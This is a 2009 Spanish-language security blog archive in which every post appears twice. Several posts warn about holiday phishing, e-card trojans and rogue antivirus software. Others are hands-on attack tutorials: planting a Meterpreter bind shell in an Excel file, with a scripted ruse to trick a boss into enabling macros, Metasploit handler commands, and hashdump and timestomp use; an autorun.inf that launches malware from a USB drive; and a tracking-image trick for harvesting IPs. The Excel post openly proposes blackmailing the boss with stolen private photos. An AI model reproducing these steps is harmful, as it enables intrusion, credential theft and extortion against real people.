Backup Oficial de SeguridadBlanca.Org

Mostrando entradas con la etiqueta Virus y Malware. Mostrar todas las entradas
Mostrando entradas con la etiqueta Virus y Malware. Mostrar todas las entradas

domingo, 20 de diciembre de 2009

Con la Navidad se prende el malware




Con la llegada de la navidad el phishing abunda de diferentes maneras... como es conocimiento de algunos uso un mail y me suscribo a todos los lugares que puedo para recibir spam y publicidad para analizar... el día de hoy me han llegado los primeros mails... el primero que me llego o que leí fue uno que supuestamente era una carta de mi "mama" quien falsifique su nombre en un sitio web que no recuerdo y bueno la cosa es que la carta era de parte de ella, intente ver la carta y no podía... investigue un poco mas el correo y di con que era un muy viejo malware que intentaba probar la versión de tu mozilla firefox... no fue gran cosa pero habían otros que eran cartas de siertos amigos pero la cosa es que estos "amigos" no eran reales o en caso de que si lo eran me mandaban targetas.EXE, si recordamos un poco Jbyte hizo hace un tiempo un analisis de una targeta y fue interesante...


A lo que voy realmente con esta entrada es que tengan cuidado, no solo nos podemos infectar de esta manera, los archivos que se pasan por msn en estas fiestas también son muy frecuentes y pues debemos tener cuidado no solo de infectarnos por el lado de nosotros sino por otros también, en estas fechas llega la familia a la casa y pues en estas ocaciones como me ha ocurrido los tios, tias, primos, primas, etc piden la PC para revisar "algo" sin embargo en los momentos de ver "algo" nos podemos infectar... para los que estamos en seguridad y para los que no, nos afecta...

imaginemos a nuestro tio mañuco jajaja en una web PORNO justo el día de Navidad o quizás mas real sería año nuevo... un malware de una página de porno malo y gratis...

Ahora la tía soltera que está suscrita a muchos chats... también hay que tener cuidado, bueno depende de los chats...

Ahora los que tienen sobrinos o primos pequeños tengan mucho cuidado con webs de gamming, estas muchas veces tienen malware y grande...


Ahora con respecto a otras cosillas en la navidad también las cosas se ponen interesantes... el malware abunda por lo que podemos investigar y todo se pone interesante, podremos analizar mas malware... podremos encontrar codigos interesantes, los que trabajen en AVs tendrán mucha acción...

Para los que quieren saber como protegerse pues tengan cuidado con los correos de publicidad en especial cuando ustedes usan hotmail hay veces que el spam llega a la bandeja de entrada... para lo de la familia les recomiendo ponerle como navegador un navegador bien configurado y pues si quieren un usuario en su pc exclusivo para ellos donde las politicas de seguridad sean mas estrictas, traten de ponerle un proxy a su navegador...



Espero les sirvan estos consejos en navidad para el Malware

Con la Navidad se prende el malware




Con la llegada de la navidad el phishing abunda de diferentes maneras... como es conocimiento de algunos uso un mail y me suscribo a todos los lugares que puedo para recibir spam y publicidad para analizar... el día de hoy me han llegado los primeros mails... el primero que me llego o que leí fue uno que supuestamente era una carta de mi "mama" quien falsifique su nombre en un sitio web que no recuerdo y bueno la cosa es que la carta era de parte de ella, intente ver la carta y no podía... investigue un poco mas el correo y di con que era un muy viejo malware que intentaba probar la versión de tu mozilla firefox... no fue gran cosa pero habían otros que eran cartas de siertos amigos pero la cosa es que estos "amigos" no eran reales o en caso de que si lo eran me mandaban targetas.EXE, si recordamos un poco Jbyte hizo hace un tiempo un analisis de una targeta y fue interesante...


A lo que voy realmente con esta entrada es que tengan cuidado, no solo nos podemos infectar de esta manera, los archivos que se pasan por msn en estas fiestas también son muy frecuentes y pues debemos tener cuidado no solo de infectarnos por el lado de nosotros sino por otros también, en estas fechas llega la familia a la casa y pues en estas ocaciones como me ha ocurrido los tios, tias, primos, primas, etc piden la PC para revisar "algo" sin embargo en los momentos de ver "algo" nos podemos infectar... para los que estamos en seguridad y para los que no, nos afecta...

imaginemos a nuestro tio mañuco jajaja en una web PORNO justo el día de Navidad o quizás mas real sería año nuevo... un malware de una página de porno malo y gratis...

Ahora la tía soltera que está suscrita a muchos chats... también hay que tener cuidado, bueno depende de los chats...

Ahora los que tienen sobrinos o primos pequeños tengan mucho cuidado con webs de gamming, estas muchas veces tienen malware y grande...


Ahora con respecto a otras cosillas en la navidad también las cosas se ponen interesantes... el malware abunda por lo que podemos investigar y todo se pone interesante, podremos analizar mas malware... podremos encontrar codigos interesantes, los que trabajen en AVs tendrán mucha acción...

Para los que quieren saber como protegerse pues tengan cuidado con los correos de publicidad en especial cuando ustedes usan hotmail hay veces que el spam llega a la bandeja de entrada... para lo de la familia les recomiendo ponerle como navegador un navegador bien configurado y pues si quieren un usuario en su pc exclusivo para ellos donde las politicas de seguridad sean mas estrictas, traten de ponerle un proxy a su navegador...



Espero les sirvan estos consejos en navidad para el Malware

viernes, 4 de diciembre de 2009

Cadenas...

mi bebe se va a morir necesito que pasen esta cadena a 10 personas para que me donen dinero y pueda salvarlo...


Crueles cosas de este estilo nos llegan a nuestro mail y pues quería comprobar que tan posible era obtener IPs y contar cuantas veces se leia el mail que yo envie, cree una absurda historia sobre que se cumpliria un milagro y eso absurdo que la gente cree, no hace falta ser informático para saberlo, nunca reenvie una cadena en mi vida solo cosas interesantes como mails chistosos pero no cosas que te obligan a reenviarla... y bueno use esta técnica y fui a analizando mas cosas que les contaré en el camino de la entrada.


Primero les voy a contar que son las cadenas y como funcionan...


La mayoría de cadenas son para recolectar mails para spam con la esperanza de recolectar mas mails que los de la lista de contactos, también con ellos se busca en muchas ocaciones crear una estrategia para luego decir algo que afecte a la gente, en una ocación me llego un correo de la elefantiasis dos dias despues me llego un mail de una marca de cremas que me la curaba... disculpen pero eso nisiquiera se cura de esa manera entonces decidí simplemente analizar el correo y pues era una estrategia de venta y robo de dinero...

esto en las personas crea miedo entonces mucha gente les aseguro que compro la crema preventiva y curativa de elefantiasis...

bueno ahora también podemos ver las típicas cadenas que te dicen que descargues cosas y que por ahí se puede esconder un gusanito como un análisis de una carta online que hizo jbyte ahora como ven nos podriamos infectar de esa manera solo un pequeño cliente servidor en visual basic serviría para leer algo de lo que nos interese o meterle un gusanito... ahora ya que tenemos una visión básica les voy a contar lo que hice...


POEMA...


Pide un deseo...



si lo envias a 5 personas en los proximos 10 min


se te cumplirá mañana mismo



Ahora como ven es una estructura básica pero resulta que hice algo... puse imagenes en algunas partes del correo... supongo que ya se imaginan... a conseguir IPs y User Agents...


Con un correo tan simple saque mas de 200 IPs y 200 user Agents...


Con un poco de php y un poco de astucia puse un .php en una etiqueta IMG




<img src="http://test.seguridadblanca.org/test-robo.php>


entonces cada ves que entraban al mail enviandolo solo a 4 personas obtuve 200 ips y mas...


Ahora imaginen como creen que los atacantes obtienen tantas victimas... ya lo saben... por eso tengan cuidado que correos habren y cuales no habren...


para los Administradores en sistemas de sus compañias:


Por motivos como estos se infectan muchos usuarios ustedes deberían capacitar a los usuarios para identificar el software malicioso y los mails malicisos ya que no solo corre peligro el trabajdor sino los sistemas de la oficina...



Saludos
Dr.White

Cadenas...

mi bebe se va a morir necesito que pasen esta cadena a 10 personas para que me donen dinero y pueda salvarlo...


Crueles cosas de este estilo nos llegan a nuestro mail y pues quería comprobar que tan posible era obtener IPs y contar cuantas veces se leia el mail que yo envie, cree una absurda historia sobre que se cumpliria un milagro y eso absurdo que la gente cree, no hace falta ser informático para saberlo, nunca reenvie una cadena en mi vida solo cosas interesantes como mails chistosos pero no cosas que te obligan a reenviarla... y bueno use esta técnica y fui a analizando mas cosas que les contaré en el camino de la entrada.


Primero les voy a contar que son las cadenas y como funcionan...


La mayoría de cadenas son para recolectar mails para spam con la esperanza de recolectar mas mails que los de la lista de contactos, también con ellos se busca en muchas ocaciones crear una estrategia para luego decir algo que afecte a la gente, en una ocación me llego un correo de la elefantiasis dos dias despues me llego un mail de una marca de cremas que me la curaba... disculpen pero eso nisiquiera se cura de esa manera entonces decidí simplemente analizar el correo y pues era una estrategia de venta y robo de dinero...

esto en las personas crea miedo entonces mucha gente les aseguro que compro la crema preventiva y curativa de elefantiasis...

bueno ahora también podemos ver las típicas cadenas que te dicen que descargues cosas y que por ahí se puede esconder un gusanito como un análisis de una carta online que hizo jbyte ahora como ven nos podriamos infectar de esa manera solo un pequeño cliente servidor en visual basic serviría para leer algo de lo que nos interese o meterle un gusanito... ahora ya que tenemos una visión básica les voy a contar lo que hice...


POEMA...


Pide un deseo...



si lo envias a 5 personas en los proximos 10 min


se te cumplirá mañana mismo



Ahora como ven es una estructura básica pero resulta que hice algo... puse imagenes en algunas partes del correo... supongo que ya se imaginan... a conseguir IPs y User Agents...


Con un correo tan simple saque mas de 200 IPs y 200 user Agents...


Con un poco de php y un poco de astucia puse un .php en una etiqueta IMG




<img src="http://test.seguridadblanca.org/test-robo.php>


entonces cada ves que entraban al mail enviandolo solo a 4 personas obtuve 200 ips y mas...


Ahora imaginen como creen que los atacantes obtienen tantas victimas... ya lo saben... por eso tengan cuidado que correos habren y cuales no habren...


para los Administradores en sistemas de sus compañias:


Por motivos como estos se infectan muchos usuarios ustedes deberían capacitar a los usuarios para identificar el software malicioso y los mails malicisos ya que no solo corre peligro el trabajdor sino los sistemas de la oficina...



Saludos
Dr.White

lunes, 30 de noviembre de 2009

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

sábado, 31 de octubre de 2009

Halloween!!!


Mi Día Favorito en todo el año... Este 31 de Octubre las empresas de Seguridad mas Reconocidas Recomiendan Que Toda la gente Actualize su software, sus Anti-Virus, Su Anti-Malware, Ad-Aware y mucho mas... Ahora yo les quiero dar unas recomendaciones de Seguridad Sobre este dia y como se debe pasar en la red...


Primero Pues que Actualizen sus Anti-Virus y Software de protección de PCs que tengan instalado en su PC.

Segundo, Los Correos, Tengan Cuidado que ahora estan llegando muchas cartas de halloween, parecidas a las de navidad, llegan como si fuesen invitaciones o targetas virtuales, deben tener cuidado ya que estas pueden llevar malware... o algun tipo de virus informático.

El Spam en si... Todos aquellos administradores les recomiendo levanten bien su firewall y pues que verifiquen elo servidor de correos...

Para Aquellos que van a pasar en sus pcs tengan cuidado con la propagación por msn de virus y gusanitos... los tipicos de mira la foto pero con relación a halloween que podrán ayudar a convencer a una victima:

Mira como está la plaza mira cuanta gente -> cualquiera que está castigado o en su casa por a b c o d motivo querra aceptar para ver y saber de lo que se pierde... El masoquismo humano...


Ahora Pues con eso creo que les irá bien el dia de hoy y no me queda mas que decir...


Feliz Halloween les Desea SeguridadBlanca... Muajajajaja

PD: Disculpen la risa es parte de la emoción por mi dia favorito...


Saludos
Dr.White

Halloween!!!


Mi Día Favorito en todo el año... Este 31 de Octubre las empresas de Seguridad mas Reconocidas Recomiendan Que Toda la gente Actualize su software, sus Anti-Virus, Su Anti-Malware, Ad-Aware y mucho mas... Ahora yo les quiero dar unas recomendaciones de Seguridad Sobre este dia y como se debe pasar en la red...


Primero Pues que Actualizen sus Anti-Virus y Software de protección de PCs que tengan instalado en su PC.

Segundo, Los Correos, Tengan Cuidado que ahora estan llegando muchas cartas de halloween, parecidas a las de navidad, llegan como si fuesen invitaciones o targetas virtuales, deben tener cuidado ya que estas pueden llevar malware... o algun tipo de virus informático.

El Spam en si... Todos aquellos administradores les recomiendo levanten bien su firewall y pues que verifiquen elo servidor de correos...

Para Aquellos que van a pasar en sus pcs tengan cuidado con la propagación por msn de virus y gusanitos... los tipicos de mira la foto pero con relación a halloween que podrán ayudar a convencer a una victima:

Mira como está la plaza mira cuanta gente -> cualquiera que está castigado o en su casa por a b c o d motivo querra aceptar para ver y saber de lo que se pierde... El masoquismo humano...


Ahora Pues con eso creo que les irá bien el dia de hoy y no me queda mas que decir...


Feliz Halloween les Desea SeguridadBlanca... Muajajajaja

PD: Disculpen la risa es parte de la emoción por mi dia favorito...


Saludos
Dr.White

sábado, 24 de octubre de 2009

Habbo Hotel Infectando Usuarios?

El conocido juego online Habbo Hotel no cuida la publicidad que pone, el dia de hoy me dijeron que lo juegue y vi que tenian un cms bien peculear... decidi darle click a un link y miren:



si me lo preguntan la página es externa, pero creo que habbo debería de fijarse el tipo de publicidad que pone en sus links ya que ellos se basan en tener una muy buena seguridad y que los niños estan seguros pero de cuando aca un troyano es algo seguro?

sin embargo pues tambien puede que habbo quiera infectar a sus usuarios para mantener un control sobre ellos... son solo especulaciones pero realmente no quiero exagerar la cosa, si hay un troyano pero el hecho está en que habbo hotel debería cuidar mas a los usuarios no creo que sea respetable que una empresa tan grande como lo es Sulake deje pasar cosas como estas...


Saludos
Dr.White

Habbo Hotel Infectando Usuarios?

El conocido juego online Habbo Hotel no cuida la publicidad que pone, el dia de hoy me dijeron que lo juegue y vi que tenian un cms bien peculear... decidi darle click a un link y miren:



si me lo preguntan la página es externa, pero creo que habbo debería de fijarse el tipo de publicidad que pone en sus links ya que ellos se basan en tener una muy buena seguridad y que los niños estan seguros pero de cuando aca un troyano es algo seguro?

sin embargo pues tambien puede que habbo quiera infectar a sus usuarios para mantener un control sobre ellos... son solo especulaciones pero realmente no quiero exagerar la cosa, si hay un troyano pero el hecho está en que habbo hotel debería cuidar mas a los usuarios no creo que sea respetable que una empresa tan grande como lo es Sulake deje pasar cosas como estas...


Saludos
Dr.White

lunes, 19 de octubre de 2009

Infectando PCs con Malware por Autorun


Como muchos han escuchado hay maneras y maneras de infectar gente pero se imaginan solo decirle mira la imagen que hay en mi pen-drive mira y cuando lo metes se infecte con un troyano? pues lo que les voy a enseñar a continuación es con fines educativos...

Primero que todo debbemos de crear nuestro malware con el que queremos infectar a la victima...


una ves creado el malware vamos a abrir un Bloc de notas que llamaremos autorun.inf y dentro de el vamos a poner el siguiente codigo:

[Autorun]
label=pendrive limitex
Icon=icono.ico
Open=malware.exe


Ahora con ese codigo al meter el pendrive va a ejecutar nuestro malware.exe que pues nos hara creer que es un autorun del pendrive...

Ahora la Ingeniería social...

Vamos a decirle a la persona oye mira la imagen de "El hombre Araña" que encontré entonces la dentro de tu pendrive tambien pondras la imagen del hombre araña que lo que hará será hacer pensar a la victima que si le quería mostrar la imagen sin embargo ya la has infectado con tu malware.

Este tipo de infección no es muy segura ya que el usuario puede tener bloqueado los autoruns por seguridad al igual que lo deberiamos de hacer todos para bloquear w0rms como conficker u otros...

en el code del malware ustedes pueden poner lo que quieran o en su defecto a lo mejor no ponen el code de un malware sino un codigo de copiado de archivos para robarle datos e información a la víctima quizas una conversación de msn quizas una cookie que es mas complejo pero de todo podemos robar de esta manera...


Espero les haya gustado el tutorial y para aquellos que necesitan mas ayuda con el autorun les recomiendo el siguiente programa:

Click Aquí

El programa te ayuda a crear los autoruns para tus .exe


Saludos
Dr.White

Infectando PCs con Malware por Autorun


Como muchos han escuchado hay maneras y maneras de infectar gente pero se imaginan solo decirle mira la imagen que hay en mi pen-drive mira y cuando lo metes se infecte con un troyano? pues lo que les voy a enseñar a continuación es con fines educativos...

Primero que todo debbemos de crear nuestro malware con el que queremos infectar a la victima...


una ves creado el malware vamos a abrir un Bloc de notas que llamaremos autorun.inf y dentro de el vamos a poner el siguiente codigo:

[Autorun]
label=pendrive limitex
Icon=icono.ico
Open=malware.exe


Ahora con ese codigo al meter el pendrive va a ejecutar nuestro malware.exe que pues nos hara creer que es un autorun del pendrive...

Ahora la Ingeniería social...

Vamos a decirle a la persona oye mira la imagen de "El hombre Araña" que encontré entonces la dentro de tu pendrive tambien pondras la imagen del hombre araña que lo que hará será hacer pensar a la victima que si le quería mostrar la imagen sin embargo ya la has infectado con tu malware.

Este tipo de infección no es muy segura ya que el usuario puede tener bloqueado los autoruns por seguridad al igual que lo deberiamos de hacer todos para bloquear w0rms como conficker u otros...

en el code del malware ustedes pueden poner lo que quieran o en su defecto a lo mejor no ponen el code de un malware sino un codigo de copiado de archivos para robarle datos e información a la víctima quizas una conversación de msn quizas una cookie que es mas complejo pero de todo podemos robar de esta manera...


Espero les haya gustado el tutorial y para aquellos que necesitan mas ayuda con el autorun les recomiendo el siguiente programa:

Click Aquí

El programa te ayuda a crear los autoruns para tus .exe


Saludos
Dr.White

sábado, 10 de octubre de 2009

analisis del dominio del Malware Gusanito.exe - By Jbyte


Analizando un poco mas el dominio de donde se descarga el malware me di cuenta de lo siguiente:



Como vemos aparte del ejecutable podemos encontar los logs que genera el malware
al abrir uno de estos log que por cuestiones de seguridad no mostrare me pude dar cuenta que el malware descargado es un troyano bancario segun los logs que pude leer ya que almacena informacion de las cuentas bancarias de usuarios que an sido infectados por el troyano bancario
Ademas recordemos que este troyano no es detectado por antivirus que no cuentan con sistemas de deteccion heuristica asi es estemos alertas a este tipo de malware.

Nota:

El dominio de donde se descarga el malware es un dominio legitimo que la pareser a sido hackeador para usarlo para la distribucion de malware.


Fuente


Saludos
Dr.White

analisis del dominio del Malware Gusanito.exe - By Jbyte


Analizando un poco mas el dominio de donde se descarga el malware me di cuenta de lo siguiente:



Como vemos aparte del ejecutable podemos encontar los logs que genera el malware
al abrir uno de estos log que por cuestiones de seguridad no mostrare me pude dar cuenta que el malware descargado es un troyano bancario segun los logs que pude leer ya que almacena informacion de las cuentas bancarias de usuarios que an sido infectados por el troyano bancario
Ademas recordemos que este troyano no es detectado por antivirus que no cuentan con sistemas de deteccion heuristica asi es estemos alertas a este tipo de malware.

Nota:

El dominio de donde se descarga el malware es un dominio legitimo que la pareser a sido hackeador para usarlo para la distribucion de malware.


Fuente


Saludos
Dr.White

viernes, 9 de octubre de 2009

has recibido una tarjeta virtual? - By Jbyte


Hoy revisando mi correo me doy cuenta me le llego una tarjeta de Gusanito lo interesante de esto es que cuando ases click sobre el elance:



Ademas como pueden ver el correo es enviando desde info@hi5.com, el vedadero enlance al cual somos dirigidos al hacer click en el enlace para ver la tarjeta no redirigue a la siguiente direccion:
http://www.xxx.cl//tmp234/Gusanito.EXE que al abrirla nos mostrara los siguiente:



Lo cual como ya es conocido nos pide descargar un ejecutable que posiblemente sea un troyano el cual intente infectar su equipo este blog ruega no abrir de emails para asi evitar que su equipo sea infectado con algun tipo de malware.

El antivirus Avira Free lo dectecta y nos muestra lo siguiente:



Como vemos no los detecta gracias a su sistema de heuristica por eso es recomendable contar con antivirus de tenga deteccion heuristica como el avira free. Ya que al ser detectado de forma heuristica nos quieres desir que aun las empresas de entivirus no cuentan con una firma del malware por lo que como repito es bueno contar con un antivirus que tenga deteccion por heuristica.

Fuente

Saludos
Dr.White

has recibido una tarjeta virtual? - By Jbyte


Hoy revisando mi correo me doy cuenta me le llego una tarjeta de Gusanito lo interesante de esto es que cuando ases click sobre el elance:



Ademas como pueden ver el correo es enviando desde info@hi5.com, el vedadero enlance al cual somos dirigidos al hacer click en el enlace para ver la tarjeta no redirigue a la siguiente direccion:
http://www.xxx.cl//tmp234/Gusanito.EXE que al abrirla nos mostrara los siguiente:



Lo cual como ya es conocido nos pide descargar un ejecutable que posiblemente sea un troyano el cual intente infectar su equipo este blog ruega no abrir de emails para asi evitar que su equipo sea infectado con algun tipo de malware.

El antivirus Avira Free lo dectecta y nos muestra lo siguiente:



Como vemos no los detecta gracias a su sistema de heuristica por eso es recomendable contar con antivirus de tenga deteccion heuristica como el avira free. Ya que al ser detectado de forma heuristica nos quieres desir que aun las empresas de entivirus no cuentan con una firma del malware por lo que como repito es bueno contar con un antivirus que tenga deteccion por heuristica.

Fuente

Saludos
Dr.White

viernes, 11 de septiembre de 2009

Rogue Malware


Hablaremos un poco de esto...


El Rogue Malware... este tipo de malware lo que hace es tratar de convencerte de que hay un virus en el sistema para que pagues y simulan que lo remueven de tu sistema.


¿Como funciona?

- El Malware lo que hace es simular una advertencia de microsoft diciendote que tienes un software malicioso con un link en el cual hay una descarga de pago que dice que remueven ese Virus.

¿La infección?

- Pues se puede infectar uno descargando archivos de webs no recomendadas, la instalación no es notoria, tambien suele suceder que dan versión de prueba de Anti-malwares que el usuario descarga y termina infectandose con uno de estos...

¿si estoy infectado?

- si tienes un buen antivirus y/o Anti-malware, o algun tipo de programa protector que tenga firmas actualizadas pues lo detectará y automaticamente lo eliminará, si el malware ha sido muy bien programado habrá que desinfectar archivo por archivo lo cual resulta un poco dificil ya que tendriamos que hacer seguimiento a los archivos que usa el proceso.

¿Softwares malignos?

- MalwareCore, Antivirus 2009, WinSpywareProtect, WinDefender, etc

¿Recomendación?

- Pues si quieren saber de programas para la eliminación de ciertos virus consulten con gente que sabe ya que pueden correr el riesgo de descargar uno de estos.


Saludos
Dr.White

Rogue Malware


Hablaremos un poco de esto...


El Rogue Malware... este tipo de malware lo que hace es tratar de convencerte de que hay un virus en el sistema para que pagues y simulan que lo remueven de tu sistema.


¿Como funciona?

- El Malware lo que hace es simular una advertencia de microsoft diciendote que tienes un software malicioso con un link en el cual hay una descarga de pago que dice que remueven ese Virus.

¿La infección?

- Pues se puede infectar uno descargando archivos de webs no recomendadas, la instalación no es notoria, tambien suele suceder que dan versión de prueba de Anti-malwares que el usuario descarga y termina infectandose con uno de estos...

¿si estoy infectado?

